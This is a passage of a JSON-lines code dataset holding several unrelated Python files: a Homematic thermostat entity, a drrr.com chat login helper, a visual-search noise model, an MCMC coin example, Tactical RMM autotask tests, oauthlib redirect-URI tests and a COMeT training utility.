mode.lower()\n\n # Filter HVAC states\n if mode not in (HVAC_MODE_AUTO, HVAC_MODE_HEAT):\n return None\n return mode\n\n @property\n def preset_modes(self):\n \"\"\"Return a list of available preset modes.\"\"\"\n preset_modes = []\n for mode in self._hmdevice.ACTIONNODE:\n if mode in HM_PRESET_MAP:\n preset_modes.append(HM_PRESET_MAP[mode])\n return preset_modes\n\n @property\n def current_humidity(self):\n \"\"\"Return the current humidity.\"\"\"\n for node in HM_HUMI_MAP:\n if node in self._data:\n return self._data[node]\n\n @property\n def current_temperature(self):\n \"\"\"Return the current temperature.\"\"\"\n for node in HM_TEMP_MAP:\n if node in self._data:\n return self._data[node]\n\n @property\n def target_temperature(self):\n \"\"\"Return the target temperature.\"\"\"\n return self._data.get(self._state)\n\n def set_temperature(self, **kwargs):\n \"\"\"Set new target temperature.\"\"\"\n temperature = kwargs.get(ATTR_TEMPERATURE)\n if temperature is None:\n return None\n\n self._hmdevice.writeNodeData(self._state, float(temperature))\n\n def set_hvac_mode(self, hvac_mode):\n \"\"\"Set new target hvac mode.\"\"\"\n if hvac_mode == HVAC_MODE_AUTO:\n self._hmdevice.MODE = self._hmdevice.AUTO_MODE\n elif hvac_mode == HVAC_MODE_HEAT:\n self._hmdevice.MODE = self._hmdevice.MANU_MODE\n elif hvac_mode == HVAC_MODE_OFF:\n self._hmdevice.turnoff()\n\n def set_preset_mode(self, preset_mode: str) -> None:\n \"\"\"Set new preset mode.\"\"\"\n if preset_mode == PRESET_BOOST:\n self._hmdevice.MODE = self._hmdevice.BOOST_MODE\n elif preset_mode == PRESET_COMFORT:\n self._hmdevice.MODE = self._hmdevice.COMFORT_MODE\n elif preset_mode == PRESET_ECO:\n self._hmdevice.MODE = self._hmdevice.LOWERING_MODE\n\n @property\n def min_temp(self):\n \"\"\"Return the minimum temperature.\"\"\"\n return 4.5\n\n @property\n def max_temp(self):\n \"\"\"Return the maximum temperature.\"\"\"\n return 30.5\n\n @property\n def target_temperature_step(self):\n \"\"\"Return the supported step of target temperature.\"\"\"\n return 0.5\n\n @property\n def _hm_control_mode(self):\n \"\"\"Return Control mode.\"\"\"\n if HMIP_CONTROL_MODE in self._data:\n return self._data[HMIP_CONTROL_MODE]\n # Homematic\n return self._data[\"CONTROL_MODE\"]\n\n def _init_data_struct(self):\n \"\"\"Generate a data dict (self._data) from the Homematic metadata.\"\"\"\n self._state = next(iter(self._hmdevice.WRITENODE.keys()))\n self._data[self._state] = None\n\n if (\n HM_CONTROL_MODE in self._hmdevice.ATTRIBUTENODE\n or HMIP_CONTROL_MODE in self._hmdevice.ATTRIBUTENODE\n ):\n self._data[HM_CONTROL_MODE] = None\n\n for node in self._hmdevice.SENSORNODE.keys():\n self._data[node] = None\n"} {"ext": "py", "sha": "1a2f643387f6c7bd230bc3199ccef4cb9b4c0248", "content": "import os,re\nimport requests\nimport time\nimport json\n\n\nclass Connect(object):\n def __init__(self, name='Athus', icon=\"Zaika\"):\n self.name = name\n self.icon = icon\n self.session = requests.session()\n\n def save_cookie(self, file_name):\n f = open(file_name, 'w+')\n f.write(str(self.session.cookies.get_dict()))\n f.close()\n\n def login(self):\n home = self.session.get('https://drrr.com',headers={'User-Agent': 'Bot'})\n token = re.search('', home.text).group(0)[-34:-2]\n home.close()\n login_body = {\n 'name': self.name,\n 'login': 'ENTER',\n 'token': token,\n 'direct-join': '',\n 'language': 'en-US',\n 'icon': self.icon\n }\n li = self.session.post('https://drrr.com', login_body, headers={'User-Agent': 'Bot'})\n li.close()"} {"ext": "py", "sha": "1a2f6502b0f0af6974f54b5c71da4c379fa3cecb", "content": "from GlobalConstants import N_ROWS, N_COLS, FEATURE_COLOUR, FEATURE_SHAPE, FEATURE_SIZE, FEATURE_TEXT\r\nimport numpy as np\r\nfrom scipy.spatial import distance\r\nfrom DisplayGenerator import DisplayGenerator\r\n\r\n\r\nclass ObservationModel(object):\r\n\r\n def sample(self, action, current_display):\r\n \"\"\"\r\n Samples a random observation from a given display.\r\n :param seed:\r\n :return: 2D array with colour and shape noisy observation\r\n \"\"\"\r\n x = action / N_COLS\r\n y = action % N_COLS\r\n obs_space_col = self.observe_feature(current_display, x, y, FEATURE_COLOUR)\r\n obs_space_shp = self.observe_feature(current_display, x, y, FEATURE_SHAPE)\r\n obs_space_size = self.observe_feature(current_display, x, y, FEATURE_SIZE)\r\n obs_space_text = self.observe_feature(current_display, x, y, FEATURE_TEXT)\r\n\r\n return obs_space_col, obs_space_shp, obs_space_size, obs_space_text\r\n\r\n def observe_feature(self, display, x, y, feature):\r\n observation = self.add_feature_noise(display, x, y, feature)\r\n\r\n #observation = self.add_spatial_noise(temp, x, y, global_variables)\r\n\r\n return observation\r\n\r\n def add_feature_noise(self, features, x, y, feature):\r\n obs_space = np.ones((N_ROWS, N_COLS)) * -1\r\n\r\n #for COLOUR.\r\n if feature == FEATURE_COLOUR:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.2*e) + (0*e*e) + (0.0004*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if features.objects[ext_x][ext_y].size > np.random.normal(mu,0.5,1)[0]:\r\n if features.objects[ext_x][ext_y].color == features.target.color:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n #for SHAPE.\r\n if feature == FEATURE_SHAPE:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.2*e) + (0*e*e) + (0.025*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if features.objects[ext_x][ext_y].size > np.random.normal(mu,0.5,1)[0]:\r\n if features.objects[ext_x][ext_y].shape == features.target.shape:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n #for SIZE.\r\n if feature == FEATURE_SIZE:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.2*e) + (0*e*e) + (0.0004*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if features.objects[ext_x][ext_y].size > np.random.normal(mu,0.5,1)[0]:\r\n if features.objects[ext_x][ext_y].size == features.target.size:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n #for TEXT.\r\n if feature == FEATURE_TEXT:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.1*e) + (0*e*e) + (0.05*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if .26 > np.random.normal(mu,1.0,1)[0]:\r\n if features.objects[ext_x][ext_y].text == features.target.text:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n return obs_space\r\n\r\n def get_eccentricity(self, fix_x, fix_y, ext_x, ext_y):\r\n return distance.euclidean([fix_x, fix_y], [ext_x, ext_y])\r\n\r\n\r\n#gen = DisplayGenerator()\r\n\r\n#env = gen.sample()\r\n\r\n#space = np.ones((N_ROWS, N_COLS)) * -1\r\n#print env.target\r\n#for ext_x in range(0, N_ROWS, 1):\r\n# for ext_y in range(0, N_COLS, 1):\r\n# if env.objects[ext_x][ext_y].text == env.target.text:\r\n# space[ext_x][ext_y] = 1\r\n\r\n#print space\r\n#print \"------------\"\r\n#model = ObservationModel()\r\n\r\n#col, shp, size, txt = model.sample(0, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(10, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(38, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(70, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(76, env)\r\n\r\n#print txt"} {"ext": "py", "sha": "1a2f6603f13d1021c92282b072a8ec83bbe50b05", "content": "\n# http://people.duke.edu/~ccc14/sta-663-2016/16A_MCMC.html\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy import stats\n\n\nthetas = np.linspace(0, 1, 200)\n\n\n\nn = 100\nh = 61\na = 10\nb = 10\n\n\n\n\n\ndef target(lik, prior, n, h, theta):\n if theta < 0 or theta > 1:\n return 0\n else:\n return lik(n, theta).pmf(h)*prior.pdf(theta)\n\ndef mh_coin(niters, n, h, theta, lik, prior, sigma):\n samples = [theta]\n while len(samples) < niters:\n theta_p = theta + stats.norm(0, sigma).rvs()\n rho = min(1, target(lik, prior, n, h, theta_p)/target(lik, prior, n, h, theta ))\n u = np.random.uniform()\n if u < rho:\n theta = theta_p\n samples.append(theta)\n return samples\n\n\nlik = stats.binom\nprior = stats.beta(a, b)\nsigma = 0.05\nniters = 100\n\nsampless = [mh_coin(niters, n, h, theta, lik, prior, sigma) for theta in np.arange(0.1, 1, 0.2)]\n\n\nfor samples in sampless:\n plt.plot(samples, '-o')\nplt.xlim([0, niters])\nplt.ylim([0, 1]);"} {"ext": "py", "sha": "1a2f6622255bf45a2dae7055f355c247c3f4b237", "content": "import datetime as dt\nfrom unittest.mock import patch, call\nfrom model_bakery import baker\nfrom django.utils import timezone as djangotime\n\nfrom tacticalrmm.test import TacticalTestCase\n\nfrom .models import AutomatedTask\nfrom logs.models import PendingAction\nfrom .serializers import AutoTaskSerializer\nfrom .tasks import remove_orphaned_win_tasks, run_win_task, create_win_task_schedule\n\n\nclass TestAutotaskViews(TacticalTestCase):\n def setUp(self):\n self.authenticate()\n self.setup_coresettings()\n\n @patch(\"automation.tasks.generate_agent_tasks_from_policies_task.delay\")\n @patch(\"autotasks.tasks.create_win_task_schedule.delay\")\n def test_add_autotask(\n self, create_win_task_schedule, generate_agent_tasks_from_policies_task\n ):\n url = \"/tasks/automatedtasks/\"\n\n # setup data\n script = baker.make_recipe(\"scripts.script\")\n agent = baker.make_recipe(\"agents.agent\")\n policy = baker.make(\"automation.Policy\")\n check = baker.make_recipe(\"checks.diskspace_check\", agent=agent)\n\n # test script set to invalid pk\n data = {\"autotask\": {\"script\": 500}}\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test invalid policy\n data = {\"autotask\": {\"script\": script.id}, \"policy\": 500}\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test invalid agent\n data = {\n \"autotask\": {\"script\": script.id},\n \"agent\": 500,\n }\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test add task to agent\n data = {\n \"autotask\": {\n \"name\": \"Test Task Scheduled with Assigned Check\",\n \"run_time_days\": [\"Sunday\", \"Monday\", \"Friday\"],\n \"run_time_minute\": \"10:00\",\n \"timeout\": 120,\n \"enabled\": True,\n \"script\": script.id,\n \"script_args\": None,\n \"task_type\": \"scheduled\",\n \"assigned_check\": check.id,\n },\n \"agent\": agent.id,\n }\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n\n create_win_task_schedule.assert_called()\n\n # test add task to policy\n data = {\n \"autotask\": {\n \"name\": \"Test Task Manual\",\n \"run_time_days\": [],\n \"timeout\": 120,\n \"enabled\": True,\n \"script\": script.id,\n \"script_args\": None,\n \"task_type\": \"manual\",\n \"assigned_check\": None,\n },\n \"policy\": policy.id,\n }\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n\n generate_agent_tasks_from_policies_task.assert_called_with(policy.id)\n\n self.check_not_authenticated(\"post\", url)\n\n def test_get_autotask(self):\n\n # setup data\n agent = baker.make_recipe(\"agents.agent\")\n baker.make(\"autotasks.AutomatedTask\", agent=agent, _quantity=3)\n\n url = f\"/tasks/{agent.id}/automatedtasks/\"\n\n resp = self.client.get(url, format=\"json\")\n serializer = AutoTaskSerializer(agent)\n\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.data, serializer.data)\n\n self.check_not_authenticated(\"get\", url)\n\n @patch(\"autotasks.tasks.enable_or_disable_win_task.delay\")\n @patch(\"automation.tasks.update_policy_task_fields_task.delay\")\n def test_update_autotask(\n self, update_policy_task_fields_task, enable_or_disable_win_task\n ):\n # setup data\n agent = baker.make_recipe(\"agents.agent\")\n agent_task = baker.make(\"autotasks.AutomatedTask\", agent=agent)\n policy = baker.make(\"automation.Policy\")\n policy_task = baker.make(\"autotasks.AutomatedTask\", policy=policy)\n\n # test invalid url\n resp = self.client.patch(\"/tasks/500/automatedtasks/\", format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n url = f\"/tasks/{agent_task.id}/automatedtasks/\"\n\n # test editing agent task\n data = {\"enableordisable\": False}\n\n resp = self.client.patch(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n enable_or_disable_win_task.assert_called_with(pk=agent_task.id, action=False)\n\n url = f\"/tasks/{policy_task.id}/automatedtasks/\"\n\n # test editing policy task\n data = {\"enableordisable\": True}\n\n resp = self.client.patch(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n update_policy_task_fields_task.assert_called_with(policy_task.id, True)\n\n self.check_not_authenticated(\"patch\", url)\n\n @patch(\"autotasks.tasks.delete_win_task_schedule.delay\")\n @patch(\"automation.tasks.delete_policy_autotask_task.delay\")\n def test_delete_autotask(\n self, delete_policy_autotask_task, delete_win_task_schedule\n ):\n # setup data\n agent = baker.make_recipe(\"agents.agent\")\n agent_task = baker.make(\"autotasks.AutomatedTask\", agent=agent)\n policy = baker.make(\"automation.Policy\")\n policy_task = baker.make(\"autotasks.AutomatedTask\", policy=policy)\n\n # test invalid url\n resp = self.client.delete(\"/tasks/500/automatedtasks/\", format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test delete agent task\n url = f\"/tasks/{agent_task.id}/automatedtasks/\"\n resp = self.client.delete(url, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n delete_win_task_schedule.assert_called_with(pk=agent_task.id)\n\n # test delete policy task\n url = f\"/tasks/{policy_task.id}/automatedtasks/\"\n resp = self.client.delete(url, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n delete_policy_autotask_task.assert_called_with(policy_task.id)\n\n self.check_not_authenticated(\"delete\", url)\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_run_autotask(self, nats_cmd):\n # setup data\n agent = baker.make_recipe(\"agents.agent\", version=\"1.1.0\")\n task = baker.make(\"autotasks.AutomatedTask\", agent=agent)\n\n # test invalid url\n resp = self.client.get(\"/tasks/runwintask/500/\", format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test run agent task\n url = f\"/tasks/runwintask/{task.id}/\"\n resp = self.client.get(url, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n nats_cmd.assert_called_with({\"func\": \"runtask\", \"taskpk\": task.id}, wait=False)\n nats_cmd.reset_mock()\n\n old_agent = baker.make_recipe(\"agents.agent\", version=\"1.0.2\")\n task2 = baker.make(\"autotasks.AutomatedTask\", agent=old_agent)\n url = f\"/tasks/runwintask/{task2.id}/\"\n resp = self.client.get(url, format=\"json\")\n self.assertEqual(resp.status_code, 400)\n nats_cmd.assert_not_called()\n\n self.check_not_authenticated(\"get\", url)\n\n\nclass TestAutoTaskCeleryTasks(TacticalTestCase):\n def setUp(self):\n self.authenticate()\n self.setup_coresettings()\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_remove_orphaned_win_task(self, nats_cmd):\n self.agent = baker.make_recipe(\"agents.agent\")\n self.task1 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 1\",\n win_task_name=AutomatedTask.generate_task_name(),\n )\n\n # test removing an orphaned task\n win_tasks = [\n \"Adobe Acrobat Update Task\",\n \"AdobeGCInvoker-1.0\",\n \"GoogleUpdateTaskMachineCore\",\n \"GoogleUpdateTaskMachineUA\",\n \"OneDrive Standalone Update Task-S-1-5-21-717461175-241712648-1206041384-1001\",\n self.task1.win_task_name,\n \"TacticalRMM_fixmesh\",\n \"TacticalRMM_SchedReboot_jk324kajd\",\n \"TacticalRMM_iggrLcOaldIZnUzLuJWPLNwikiOoJJHHznb\", # orphaned task\n ]\n\n self.calls = [\n call({\"func\": \"listschedtasks\"}, timeout=10),\n call(\n {\n \"func\": \"delschedtask\",\n \"schedtaskpayload\": {\n \"name\": \"TacticalRMM_iggrLcOaldIZnUzLuJWPLNwikiOoJJHHznb\"\n },\n },\n timeout=10,\n ),\n ]\n\n nats_cmd.side_effect = [win_tasks, \"ok\"]\n ret = remove_orphaned_win_tasks.s(self.agent.pk).apply()\n self.assertEqual(nats_cmd.call_count, 2)\n nats_cmd.assert_has_calls(self.calls)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test nats delete task fail\n nats_cmd.reset_mock()\n nats_cmd.side_effect = [win_tasks, \"error deleting task\"]\n ret = remove_orphaned_win_tasks.s(self.agent.pk).apply()\n nats_cmd.assert_has_calls(self.calls)\n self.assertEqual(nats_cmd.call_count, 2)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # no orphaned tasks\n nats_cmd.reset_mock()\n win_tasks.remove(\"TacticalRMM_iggrLcOaldIZnUzLuJWPLNwikiOoJJHHznb\")\n nats_cmd.side_effect = [win_tasks, \"ok\"]\n ret = remove_orphaned_win_tasks.s(self.agent.pk).apply()\n self.assertEqual(nats_cmd.call_count, 1)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_run_win_task(self, nats_cmd):\n self.agent = baker.make_recipe(\"agents.agent\")\n self.task1 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 1\",\n win_task_name=AutomatedTask.generate_task_name(),\n )\n nats_cmd.return_value = \"ok\"\n ret = run_win_task.s(self.task1.pk).apply()\n self.assertEqual(ret.status, \"SUCCESS\")\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_create_win_task_schedule(self, nats_cmd):\n self.agent = baker.make_recipe(\"agents.agent\")\n\n task_name = AutomatedTask.generate_task_name()\n # test scheduled task\n self.task1 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 1\",\n win_task_name=task_name,\n task_type=\"scheduled\",\n run_time_bit_weekdays=127,\n run_time_minute=\"21:55\",\n )\n self.assertEqual(self.task1.sync_status, \"notsynced\")\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task1.pk, pending_action=False).apply()\n self.assertEqual(nats_cmd.call_count, 1)\n nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"weekly\",\n \"weekdays\": 127,\n \"pk\": self.task1.pk,\n \"name\": task_name,\n \"hour\": 21,\n \"min\": 55,\n },\n },\n timeout=10,\n )\n self.task1 = AutomatedTask.objects.get(pk=self.task1.pk)\n self.assertEqual(self.task1.sync_status, \"synced\")\n\n nats_cmd.return_value = \"timeout\"\n ret = create_win_task_schedule.s(pk=self.task1.pk, pending_action=False).apply()\n self.assertEqual(ret.status, \"SUCCESS\")\n self.task1 = AutomatedTask.objects.get(pk=self.task1.pk)\n self.assertEqual(self.task1.sync_status, \"notsynced\")\n\n # test pending action\n self.pending_action = PendingAction.objects.create(\n agent=self.agent, action_type=\"taskaction\"\n )\n self.assertEqual(self.pending_action.status, \"pending\")\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(\n pk=self.task1.pk, pending_action=self.pending_action.pk\n ).apply()\n self.assertEqual(ret.status, \"SUCCESS\")\n self.pending_action = PendingAction.objects.get(pk=self.pending_action.pk)\n self.assertEqual(self.pending_action.status, \"completed\")\n\n # test runonce with future date\n nats_cmd.reset_mock()\n task_name = AutomatedTask.generate_task_name()\n run_time_date = djangotime.now() + djangotime.timedelta(hours=22)\n self.task2 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 2\",\n win_task_name=task_name,\n task_type=\"runonce\",\n run_time_date=run_time_date,\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task2.pk, pending_action=False).apply()\n nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"once\",\n \"pk\": self.task2.pk,\n \"name\": task_name,\n \"year\": int(dt.datetime.strftime(self.task2.run_time_date, \"%Y\")),\n \"month\": dt.datetime.strftime(self.task2.run_time_date, \"%B\"),\n \"day\": int(dt.datetime.strftime(self.task2.run_time_date, \"%d\")),\n \"hour\": int(dt.datetime.strftime(self.task2.run_time_date, \"%H\")),\n \"min\": int(dt.datetime.strftime(self.task2.run_time_date, \"%M\")),\n },\n },\n timeout=10,\n )\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test runonce with date in the past\n nats_cmd.reset_mock()\n task_name = AutomatedTask.generate_task_name()\n run_time_date = djangotime.now() - djangotime.timedelta(days=13)\n self.task3 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 3\",\n win_task_name=task_name,\n task_type=\"runonce\",\n run_time_date=run_time_date,\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task3.pk, pending_action=False).apply()\n self.task3 = AutomatedTask.objects.get(pk=self.task3.pk)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test checkfailure\n nats_cmd.reset_mock()\n self.check = baker.make_recipe(\"checks.diskspace_check\", agent=self.agent)\n task_name = AutomatedTask.generate_task_name()\n self.task4 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 4\",\n win_task_name=task_name,\n task_type=\"checkfailure\",\n assigned_check=self.check,\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task4.pk, pending_action=False).apply()\n nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"manual\",\n \"pk\": self.task4.pk,\n \"name\": task_name,\n },\n },\n timeout=10,\n )\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test manual\n nats_cmd.reset_mock()\n task_name = AutomatedTask.generate_task_name()\n self.task5 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 5\",\n win_task_name=task_name,\n task_type=\"manual\",\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task5.pk, pending_action=False).apply()\n nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"manual\",\n \"pk\": self.task5.pk,\n \"name\": task_name,\n },\n },\n timeout=10,\n )\n self.assertEqual(ret.status, \"SUCCESS\")\n"} {"ext": "py", "sha": "1a2f66bc368cdfd73df0a7a327e51fefc29f6d3d", "content": "\"\"\"Ensure credentials are preserved through the authorization.\n\nThe Authorization Code Grant will need to preserve state as well as redirect\nuri and the Implicit Grant will need to preserve state.\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport json\n\nimport mock\n\nfrom oauthlib.oauth2 import (MobileApplicationServer, RequestValidator,\n WebApplicationServer)\nfrom oauthlib.oauth2.rfc6749 import errors\n\nfrom ....unittest import TestCase\nfrom .test_utils import get_fragment_credentials, get_query_credentials\n\n\nclass PreservationTest(TestCase):\n\n DEFAULT_REDIRECT_URI = 'http://i.b./path'\n\n def setUp(self):\n self.validator = mock.MagicMock(spec=RequestValidator)\n self.validator.get_default_redirect_uri.return_value = self.DEFAULT_REDIRECT_URI\n self.validator.get_code_challenge.return_value = None\n self.validator.authenticate_client.side_effect = self.set_client\n self.web = WebApplicationServer(self.validator)\n self.mobile = MobileApplicationServer(self.validator)\n\n def set_state(self, state):\n def set_request_state(client_id, code, client, request):\n request.state = state\n return True\n return set_request_state\n\n def set_client(self, request):\n request.client = mock.MagicMock()\n request.client.client_id = 'mocked'\n return True\n\n def test_state_preservation(self):\n auth_uri = 'http://example.com/path?state=xyz&client_id=abc&response_type='\n token_uri = 'http://example.com/path'\n\n # authorization grant\n h, _, s = self.web.create_authorization_response(\n auth_uri + 'code', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n code = get_query_credentials(h['Location'])['code'][0]\n self.validator.validate_code.side_effect = self.set_state('xyz')\n _, body, _ = self.web.create_token_response(token_uri,\n body='grant_type=authorization_code&code=%s' % code)\n self.assertEqual(json.loads(body)['state'], 'xyz')\n\n # implicit grant\n h, _, s = self.mobile.create_authorization_response(\n auth_uri + 'token', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertEqual(get_fragment_credentials(h['Location'])['state'][0], 'xyz')\n\n def test_redirect_uri_preservation(self):\n auth_uri = 'http://example.com/path?redirect_uri=http%3A%2F%2Fi.b%2Fpath&client_id=abc'\n redirect_uri = 'http://i.b/path'\n token_uri = 'http://example.com/path'\n\n # authorization grant\n h, _, s = self.web.create_authorization_response(\n auth_uri + '&response_type=code', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertTrue(h['Location'].startswith(redirect_uri))\n\n # confirm_redirect_uri should return false if the redirect uri\n # was given in the authorization but not in the token request.\n self.validator.confirm_redirect_uri.return_value = False\n code = get_query_credentials(h['Location'])['code'][0]\n _, body, _ = self.web.create_token_response(token_uri,\n body='grant_type=authorization_code&code=%s' % code)\n self.assertEqual(json.loads(body)['error'], 'invalid_request')\n\n # implicit grant\n h, _, s = self.mobile.create_authorization_response(\n auth_uri + '&response_type=token', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertTrue(h['Location'].startswith(redirect_uri))\n\n def test_invalid_redirect_uri(self):\n auth_uri = 'http://example.com/path?redirect_uri=http%3A%2F%2Fi.b%2Fpath&client_id=abc'\n self.validator.validate_redirect_uri.return_value = False\n\n # authorization grant\n self.assertRaises(errors.MismatchingRedirectURIError,\n self.web.create_authorization_response,\n auth_uri + '&response_type=code', scopes=['random'])\n\n # implicit grant\n self.assertRaises(errors.MismatchingRedirectURIError,\n self.mobile.create_authorization_response,\n auth_uri + '&response_type=token', scopes=['random'])\n\n def test_default_uri(self):\n auth_uri = 'http://example.com/path?state=xyz&client_id=abc'\n\n self.validator.get_default_redirect_uri.return_value = None\n\n # authorization grant\n self.assertRaises(errors.MissingRedirectURIError,\n self.web.create_authorization_response,\n auth_uri + '&response_type=code', scopes=['random'])\n\n # implicit grant\n self.assertRaises(errors.MissingRedirectURIError,\n self.mobile.create_authorization_response,\n auth_uri + '&response_type=token', scopes=['random'])\n\n def test_default_uri_in_token(self):\n auth_uri = 'http://example.com/path?state=xyz&client_id=abc'\n token_uri = 'http://example.com/path'\n\n # authorization grant\n h, _, s = self.web.create_authorization_response(\n auth_uri + '&response_type=code', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertTrue(h['Location'].startswith(self.DEFAULT_REDIRECT_URI))\n\n # confirm_redirect_uri should return true if the redirect uri\n # was not given in the authorization AND not in the token request.\n self.validator.confirm_redirect_uri.return_value = True\n code = get_query_credentials(h['Location'])['code'][0]\n self.validator.validate_code.side_effect = self.set_state('xyz')\n _, body, s = self.web.create_token_response(token_uri,\n body='grant_type=authorization_code&code=%s' % code)\n self.assertEqual(s, 200)\n self.assertEqual(self.validator.confirm_redirect_uri.call_args[0][2], self.DEFAULT_REDIRECT_URI)\n"} {"ext": "py", "sha": "1a2f6839de35c5142ce239003142bdb6ce9a9cdf", "content": "import os\r\nimport src.data.atomic as atomic_data\r\nimport src.data.conceptnet as conceptnet_data\r\nimport src.data.config as cfg\r\n\r\nimport utils.utils as utils\r\n\r\nimport pickle\r\nimport torch\r\nimport json\r\n\r\n\r\nstart_token = \"\"\r\nend_token = \"\"\r\nblank_token = \"\"\r\n\r\n\r\ndef save_checkpoint(state, filename):\r\n print(\"Saving model to {}\".format(filename))\r\n torch.save(state, filename)\r\n\r\n\r\ndef save_step(model, vocab, optimizer, opt, length, lrs):\r\n if cfg.test_save:\r\n name = \"{}.pickle\".format(utils.make_name(\r\n opt, prefix=\"garbage/models/\", is_dir=False, eval_=True))\r\n else:\r\n name = \"{}.pickle\".format(utils.make_name(\r\n opt, prefix=\"models/\", is_dir=False, eval_=True))\r\n save_checkpoint({\r\n \"epoch\": length, \"state_dict\": model.state_dict(),\r\n \"optimizer\": optimizer.state_dict(), \"opt\": opt,\r\n \"vocab\": vocab, \"epoch_learning_rates\": lrs},\r\n name)\r\n\r\n\r\ndef save_eval_file(opt, stats, eval_type=\"losses\", split=\"dev\", ext=\"pickle\"):\r\n if cfg.test_save:\r\n name = \"{}/{}.{}\".format(utils.make_name(\r\n opt, prefix=\"garbage/{}/\".format(eval_type),\r\n is_dir=True, eval_=True), split, ext)\r\n else:\r\n name = \"{}/{}.{}\".format(utils.make_name(\r\n opt, prefix=\"results/{}/\".format(eval_type),\r\n is_dir=True, eval_=True), split, ext)\r\n print(\"Saving {} {} to {}\".format(split, eval_type, name))\r\n\r\n if ext == \"pickle\":\r\n with open(name, \"wb\") as f:\r\n pickle.dump(stats, f)\r\n elif ext == \"txt\":\r\n 